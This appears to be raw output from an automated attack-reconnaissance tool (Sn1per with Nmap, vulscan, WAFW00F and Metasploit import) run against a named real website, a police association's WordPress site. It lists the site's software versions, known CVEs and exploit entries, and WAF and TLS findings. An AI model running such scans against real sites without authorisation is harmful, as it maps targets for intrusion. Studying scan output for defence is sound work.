1430| [62854] FreeBSD Ports: dovecot-managesieve
1431| [61916] FreeBSD Ports: dovecot
1432| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
1433| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
1434| [60528] FreeBSD Ports: dovecot
1435| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
1436| [60089] FreeBSD Ports: dovecot
1437| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
1438| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
1439|
1440| SecurityTracker - https://www.securitytracker.com:
1441| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
1442| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
1443| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
1444|
1445| OSVDB - http://www.osvdb.org:
1446| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
1447| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
1448| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
1449| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
1450| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
1451| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
1452| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
1453| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
1454| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
1455| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
1456| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
1457| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
1458| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
1459| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
1460| [66113] Dovecot Mail Root Directory Creation Permission Weakness
1461| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
1462| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
1463| [66110] Dovecot Multiple Unspecified Buffer Overflows
1464| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
1465| [64783] Dovecot E-mail Message Header Unspecified DoS
1466| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
1467| [62796] Dovecot mbox Format Email Header Handling DoS
1468| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
1469| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
1470| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
1471| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
1472| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
1473| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
1474| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
1475| [43137] Dovecot mail_extra_groups Symlink File Manipulation
1476| [42979] Dovecot passdbs Argument Injection Authentication Bypass
1477| [39876] Dovecot LDAP Auth Cache Security Bypass
1478| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
1479| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
1480| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
1481| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
1482| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
1483| [23281] Dovecot imap/pop3-login dovecot-auth DoS
1484| [23280] Dovecot Malformed APPEND Command DoS
1485| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
1486| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
1487| [5857] Linux pop3d Arbitrary Mail File Access
1488| [2471] akpop3d username SQL Injection
1489|_
1490Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1491Aggressive OS guesses: Linux 3.10 - 3.12 (98%), Linux 4.4 (98%), Linux 3.18 (98%), Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 2.6.39 (97%), Linux 3.10 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%)
1492No exact OS matches for host (test conditions non-ideal).
1493
1494TRACEROUTE
1495HOP RTT ADDRESS
14961 128.21 ms box6011.bluehost.com (216.172.168.193)
1497
1498OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1499Nmap done: 1 IP address (1 host up) scanned in 245.16 seconds
1500[91m + -- --=[Port 111 closed... skipping.[0m
1501[91m + -- --=[Port 123 closed... skipping.[0m
1502[91m + -- --=[Port 135 closed... skipping.[0m
1503[91m + -- --=[Port 137 closed... skipping.[0m
1504[91m + -- --=[Port 139 closed... skipping.[0m
1505[91m + -- --=[Port 161 closed... skipping.[0m
1506[91m + -- --=[Port 162 closed... skipping.[0m
1507[91m + -- --=[Port 389 closed... skipping.[0m
1508[93m + -- --=[Port 443 opened... running tests...[0m
1509[92m====================================================================================[0m
1510[91m RUNNING NMAP HTTP SCRIPTS [0m
1511[92m====================================================================================[0m
1512Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:36 UTC
1513NSE: Loaded 164 scripts for scanning.
1514NSE: Script Pre-scanning.
1515Initiating NSE at 13:36
1516Completed NSE at 13:36, 0.00s elapsed
1517Initiating NSE at 13:36
1518Completed NSE at 13:36, 0.00s elapsed
1519Initiating Parallel DNS resolution of 1 host. at 13:36
1520Completed Parallel DNS resolution of 1 host. at 13:36, 0.08s elapsed
1521Initiating SYN Stealth Scan at 13:36
1522Scanning www.rhkpa.org (216.172.168.193) [1 port]
1523Discovered open port 443/tcp on 216.172.168.193
1524Completed SYN Stealth Scan at 13:36, 0.16s elapsed (1 total ports)
1525Initiating Service scan at 13:36
1526Scanning 1 service on www.rhkpa.org (216.172.168.193)
1527Completed Service scan at 13:36, 14.14s elapsed (1 service on 1 host)
1528Initiating OS detection (try #1) against www.rhkpa.org (216.172.168.193)
1529Retrying OS detection (try #2) against www.rhkpa.org (216.172.168.193)
1530NSE: Script scanning 216.172.168.193.
1531Initiating NSE at 13:36
1532NSE Timing: About 36.01% done; ETC: 13:38 (0:00:55 remaining)
1533NSE Timing: About 67.24% done; ETC: 13:38 (0:00:40 remaining)
1534NSE: [http-wordpress-enum 216.172.168.193:443] got no answers from pipelined queries
1535Completed NSE at 13:46, 546.50s elapsed
1536Initiating NSE at 13:46
1537Completed NSE at 13:46, 6.64s elapsed
1538Nmap scan report for www.rhkpa.org (216.172.168.193)
1539Host is up (0.091s latency).
1540rDNS record for 216.172.168.193: box6011.bluehost.com
1541
1542PORT STATE SERVICE VERSION
1543443/tcp open ssl/http nginx 1.14.1
1544| http-brute:
1545|_ Path "/" does not require authentication
1546|_http-chrono: Request times for /; avg: 22383.85ms; min: 22363.53ms; max: 22426.19ms
1547|_http-csrf: Couldn't find any CSRF vulnerabilities.
1548|_http-date: Wed, 02 Oct 2019 13:37:11 GMT; -55s from local time.
1549|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
1550|_http-dombased-xss: Couldn't find any DOM based XSS.
1551| http-errors:
1552| Spidering limited to: maxpagecount=40; withinhost=www.rhkpa.org
1553| Found the following error pages:
1554|
1555| Error Code: 400
1556|_ http://www.rhkpa.org:443/
1557|_http-feed: Couldn't find any feeds.
1558|_http-fetch: Please enter the complete path of the directory to save data in.
1559| http-headers:
1560| Server: nginx/1.14.1
1561| Date: Wed, 02 Oct 2019 13:37:11 GMT
1562| Content-Type: text/html
1563| Content-Length: 271
1564| Connection: close
1565|
1566|_ (Request type: GET)
1567|_http-jsonp-detection: Couldn't find any JSONP endpoints.
1568|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
1569|_http-mobileversion-checker: No mobile version detected.
1570| http-security-headers:
1571| Strict_Transport_Security:
1572|_ HSTS not configured in HTTPS Server
1573|_http-server-header: nginx/1.14.1
1574| http-sitemap-generator:
1575| Directory structure:
1576| Longest directory structure:
1577| Depth: 0
1578| Dir: /
1579| Total files found (by extension):
1580|_
1581|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1582|_http-title: 400 The plain HTTP request was sent to HTTPS port
1583|_http-traceroute: ERROR: Script execution failed (use -d to debug)
1584| http-vhosts:
1585| 31 names had status 301
1586|_96 names had status ERROR
1587|_http-xssed: No previously reported XSS vuln.
1588| vulscan: VulDB - https://vuldb.com:
1589| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
1590| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
1591| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
1592|
1593| MITRE CVE - https://cve.mitre.org:
1594| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
1595| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
1596| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
1597| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
1598| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
1599| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
1600|
1601| SecurityFocus - https://www.securityfocus.com/bid/:
1602| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
1603| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
1604| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
1605| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
1606| [82230] nginx Multiple Denial of Service Vulnerabilities
1607| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
1608| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
1609| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
1610| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
1611| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
1612| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
1613| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
1614| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
1615| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
1616| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
1617| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
1618| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
1619| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
1620| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
1621| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
1622| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
1623| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
1624| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
1625| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
1626| [40420] nginx Directory Traversal Vulnerability
1627| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
1628| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
1629| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
1630| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
1631| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
1632|
1633| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1634| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
1635| [84172] nginx denial of service
1636| [84048] nginx buffer overflow
1637| [83923] nginx ngx_http_close_connection() integer overflow
1638| [83688] nginx null byte code execution
1639| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
1640| [82319] nginx access.log information disclosure
1641| [80952] nginx SSL spoofing
1642| [77244] nginx and Microsoft Windows request security bypass
1643| [76778] Naxsi module for Nginx nx_extract.py directory traversal
1644| [74831] nginx ngx_http_mp4_module.c buffer overflow
1645| [74191] nginx ngx_cpystrn() information disclosure
1646| [74045] nginx header response information disclosure
1647| [71355] nginx ngx_resolver_copy() buffer overflow
1648| [59370] nginx characters denial of service
1649| [59369] nginx DATA source code disclosure
1650| [59047] nginx space source code disclosure
1651| [58966] nginx unspecified directory traversal
1652| [54025] nginx ngx_http_parse.c denial of service
1653| [53431] nginx WebDAV component directory traversal
1654| [53328] Nginx CRC-32 cached domain name spoofing
1655| [53250] Nginx ngx_http_parse_complex_uri() function code execution
1656|
1657| Exploit-DB - https://www.exploit-db.com:
1658| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
1659| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
1660| [25499] nginx 1.3.9-1.4.0 DoS PoC
1661|
1662| OpenVAS (Nessus) - http://www.openvas.org:
1663| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
1664| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
1665| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
1666| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
1667| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
1668| [64869] Debian Security Advisory DSA 1884-1 (nginx)
1669|
1670| SecurityTracker - https://www.securitytracker.com:
1671| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
1672| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
1673| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
1674| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
1675|
1676| OSVDB - http://www.osvdb.org:
1677| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
1678| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
1679| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
1680| [92796] nginx ngx_http_close_connection Function Crafted r->
1681| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
1682| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
1683| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
1684| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
1685| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
1686| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
1687| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
1688| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
1689| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
1690| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
1691| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
1692| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
1693| [62617] nginx Internal DNS Cache Poisoning Weakness
1694| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
1695| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
1696| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
1697| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
1698| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
1699| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
1700| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
1701| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
1702| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
1703| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
1704|_
1705Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1706Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.35 (97%), Linux 3.10 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), WatchGuard Fireware 11.8 (97%), Tandberg VCS video conferencing system (97%)
1707No exact OS matches for host (test conditions non-ideal).
1708Uptime guess: 7.445 days (since Wed Sep 25 03:04:48 2019)
1709TCP Sequence Prediction: Difficulty=262 (Good luck!)
1710IP ID Sequence Generation: All zeros
1711
1712TRACEROUTE
1713HOP RTT ADDRESS
17141 91.41 ms box6011.bluehost.com (216.172.168.193)
1715
1716NSE: Script Post-scanning.
1717Initiating NSE at 13:46
1718Completed NSE at 13:46, 0.00s elapsed
1719Initiating NSE at 13:46
1720Completed NSE at 13:46, 0.00s elapsed
1721Read data files from: /usr/bin/../share/nmap
1722OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1723Nmap done: 1 IP address (1 host up) scanned in 576.50 seconds
1724 Raw packets sent: 83 (7.456KB) | Rcvd: 24 (1.980KB)
1725[92m====================================================================================[0m
1726[91m CHECKING FOR WAF [0m
1727[92m====================================================================================[0m
1728
1729 [1;97m______
1730 [1;97m/ \
1731 [1;97m( Woof! )
1732 [1;97m\______/ [1;91m)
1733 [1;97m,, [1;91m) ([1;93m_
1734 [1;93m.-. [1;97m- [1;92m_______ [1;91m( [1;93m|__|
1735 [1;93m()``; [1;92m|==|_______) [1;91m.)[1;93m|__|
1736 [1;93m/ (' [1;92m/|\ [1;91m( [1;93m|__|
1737 [1;93m( / ) [1;92m / | \ [1;91m. [1;93m|__|
1738 [1;93m\(_)_)) [1;92m/ | \ [1;93m|__|[0m
1739
1740 WAFW00F - Web Application Firewall Detection Tool
1741
1742
1743Checking https://www.rhkpa.org
1744The site https://www.rhkpa.org is behind ModSecurity (SpiderLabs) WAF.
1745Number of requests: 5
1746
1747[92m====================================================================================[0m
1748[91m GATHERING HTTP INFO [0m
1749[92m====================================================================================[0m
1750[1m[34mhttps://www.rhkpa.org[0m [200 OK] [1m[37mCookies[0m[[37mMAILPOET_SESSION,PHPSESSID,pmpro_visit[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mnginx/1.14.1[0m], [1m[37mIP[0m[[37m216.172.168.193[0m], [1m[37mJQuery[0m[[1m[32m5.2.3[0m], [1m[37mMetaGenerator[0m[[37mWordPress Download Manager 3.0.2[0m], [1m[37mPoweredBy[0m[[37mPaid[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mRHKPA | Royal Hong Kong Police Association[0m], [1m[37mUncommonHeaders[0m[[37mlink,x-et-api-version,x-et-api-root,x-et-api-origin,x-tec-api-version,x-tec-api-root,x-tec-api-origin,x-server-cache,x-proxy-cache[0m], [1m[37mWordPress[0m, [1m[37mnginx[0m[[1m[32m1.14.1[0m]
1751[92m====================================================================================[0m
1752[91m GATHERING SERVER INFO [0m
1753[92m====================================================================================[0m
1754
1755wig - WebApp Information Gatherer
1756
1757
1758[92m====================================================================================[0m
1759[91m CHECKING HTTP HEADERS [0m
1760[92m====================================================================================[0m
1761[92m====================================================================================[0m
1762[91m GATHERING WEB FINGERPRINT [0m
1763[92m====================================================================================[0m
1764 PHP
1765 Bootstrap
1766 Nginx 1.14.1
1767 WooCommerce 3.7.0
1768 jQuery Migrate
1769 WordPress
1770 Google Font API
1771 jQuery 1.12.4
1772 X-ET-API-VERSION: v1
1773 X-ET-API-ROOT: https://www.rhkpa.org/wp-json/tribe/tickets/v1/
1774 X-ET-API-ORIGIN: https://www.rhkpa.org
1775 X-TEC-API-VERSION: v1
1776 X-TEC-API-ROOT: https://www.rhkpa.org/wp-json/tribe/events/v1/
1777 X-TEC-API-ORIGIN: https://www.rhkpa.org
1778 X-Server-Cache: true
1779 X-Proxy-Cache: MISS
1780[92m====================================================================================[0m
1781[91m DISPLAYING META GENERATOR TAGS [0m
1782[92m====================================================================================[0m
1783[92m====================================================================================[0m
1784[91m DISPLAYING COMMENTS [0m
1785[92m====================================================================================[0m
1786[92m====================================================================================[0m
1787[91m DISPLAYING SITE LINKS [0m
1788[92m====================================================================================[0m
1789[92m====================================================================================[0m
1790[91m GATHERING SSL/TLS INFO [0m
1791[92m====================================================================================[0m
1792Version: [32m1.11.13-static[0m
1793OpenSSL 1.0.2-chacha (1.0.2g-dev)
1794[0m
1795[32mConnected to 216.172.168.193[0m
1796
1797Testing SSL server [32mwww.rhkpa.org[0m on port [32m443[0m using SNI name [32mwww.rhkpa.org[0m
1798
1799 [1;34mTLS Fallback SCSV:[0m
1800Server [32msupports[0m TLS Fallback SCSV
1801
1802 [1;34mTLS renegotiation:[0m
1803[32mSecure[0m session renegotiation supported
1804
1805 [1;34mTLS Compression:[0m
1806Compression [32mdisabled[0m
1807
1808 [1;34mHeartbleed:[0m
1809TLS 1.2 [32mnot vulnerable[0m to heartbleed
1810TLS 1.1 [32mnot vulnerable[0m to heartbleed
1811TLS 1.0 [32mnot vulnerable[0m to heartbleed
1812
1813 [1;34mSupported Server Cipher(s):[0m
1814[32mPreferred[0m TLSv1.2 [32m256[0m bits [32mECDHE-RSA-AES256-GCM-SHA384 [0m Curve P-256 DHE 256
1815Accepted TLSv1.2 [32m128[0m bits [32mECDHE-RSA-AES128-GCM-SHA256 [0m Curve P-256 DHE 256
1816Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1817Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1818Accepted TLSv1.2 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1819Accepted TLSv1.2 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1820[32mPreferred[0m TLSv1.1 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1821Accepted TLSv1.1 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1822[32mPreferred[0m [33mTLSv1.0[0m [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1823Accepted [33mTLSv1.0[0m [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1824
1825 [1;34mSSL Certificate:[0m
1826Signature Algorithm: [32msha256WithRSAEncryption[0m
1827RSA Key Strength: 2048
1828
1829Subject: rhkpa.org
1830Altnames: DNS:new.rhkpa.org, DNS:old.rhkpa.org, DNS:rhkpa.org, DNS:www.new.rhkpa.org, DNS:www.old.rhkpa.org, DNS:www.rhkpa.org
1831Issuer: Let's Encrypt Authority X3
1832
1833Not valid before: [32mSep 11 07:45:34 2019 GMT[0m
1834Not valid after: [32mDec 10 07:45:34 2019 GMT[0m
1835
1836[92m====================================================================================[0m
1837[91m SAVING SCREENSHOTS [0m
1838[92m====================================================================================[0m
1839[91m[+][0m Screenshot saved to /usr/share/sniper/loot/workspace/www.rhkpa.org/screenshots/www.rhkpa.org-port443.jpg
1840webscreenshot.py version 2.2.1
1841
1842[+] 1 URLs to be screenshot
1843[ERROR][https://www.rhkpa.org:443] renderer binary could not have been found in your current PATH environment variable, exiting
1844[+] 0 actual URLs screenshot
1845[+] 1 error(s)
1846 https://www.rhkpa.org:443
1847[91m + -- --=[Port 445 closed... skipping.[0m
1848[91m + -- --=[Port 500 closed... skipping.[0m
1849[91m + -- --=[Port 512 closed... skipping.[0m
1850[91m + -- --=[Port 513 closed... skipping.[0m
1851[91m + -- --=[Port 514 closed... skipping.[0m
1852[91m + -- --=[Port 1099 closed... skipping.[0m
1853[91m + -- --=[Port 1433 closed... skipping.[0m
1854[91m + -- --=[Port 2049 closed... skipping.[0m
1855[91m + -- --=[Port 3306 closed... skipping.[0m
1856[91m + -- --=[Port 3310 closed... skipping.[0m
1857[91m + -- --=[Port 3128 closed... skipping.[0m
1858[91m + -- --=[Port 3389 closed... skipping.[0m
1859[91m + -- --=[Port 3632 closed... skipping.[0m
1860[91m + -- --=[Port 5432 closed... skipping.[0m
1861[91m + -- --=[Port 5555 closed... skipping.[0m
1862[91m + -- --=[Port 5800 closed... skipping.[0m
1863[91m + -- --=[Port 5900 closed... skipping.[0m
1864[91m + -- --=[Port 5984 closed... skipping.[0m
1865[91m + -- --=[Port 6000 closed... skipping.[0m
1866[91m + -- --=[Port 6667 closed... skipping.[0m
1867[91m + -- --=[Port 7001 closed... skipping.[0m
1868[91m + -- --=[Port 8000 closed... skipping.[0m
1869[91m + -- --=[Port 9495 closed... skipping.[0m
1870[91m + -- --=[Port 10000 closed... skipping.[0m
1871[91m + -- --=[Port 16992 closed... skipping.[0m
1872[91m + -- --=[Port 27017 closed... skipping.[0m
1873[91m + -- --=[Port 27018 closed... skipping.[0m
1874[91m + -- --=[Port 27019 closed... skipping.[0m
1875[91m + -- --=[Port 28017 closed... skipping.[0m
1876[91m + -- --=[Port 49180 closed... skipping.[0m
1877[92m====================================================================================[0m
1878[91m SCANNING FOR COMMON VULNERABILITIES [0m
1879[92m====================================================================================[0m
1880[92m====================================================================================[0m
1881[91m SKIPPING FULL NMAP PORT SCAN [0m
1882[92m====================================================================================[0m
1883[92m====================================================================================[0m
1884[91m SKIPPING BRUTE FORCE [0m
1885[92m====================================================================================[0m
1886[92m====================================================================================[0m
1887[91m SCAN COMPLETE! [0m
1888[92m====================================================================================[0m
1889[91m ____ [0m
1890[91m _________ / _/___ ___ _____[0m
1891[91m / ___/ __ \ / // __ \/ _ \/ ___/[0m
1892[91m (__ ) / / // // /_/ / __/ / [0m
1893[91m /____/_/ /_/___/ .___/\___/_/ [0m
1894[91m /_/ [0m
1895
1896[94m[*] Opening loot directory /usr/share/sniper/loot/workspace/www.rhkpa.org [[0m[92mOK[0m[94m][0m
1897[93m + -- --=[Starting Metasploit service...[0m
1898[01;33m[i][00m Database already started
1899[93m + -- --=[Importing NMap XML files into Metasploit...[0m
1900[1m[31m[-][0m ***
1901[1m[31m[-][0m * WARNING: No database support: could not connect to server: Connection refused
1902 Is the server running on host "localhost" (::1) and accepting
1903 TCP/IP connections on port 5432?
1904could not connect to server: Connection refused
1905 Is the server running on host "localhost" (127.0.0.1) and accepting
1906 TCP/IP connections on port 5432?
1907
1908[1m[31m[-][0m ***
1909[0m[36m%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1910%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1911%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1912%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
1913%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1914%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1915%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1916%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
1917%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
1918%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
1919%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
1920%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
1921%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
1922%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
1923%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
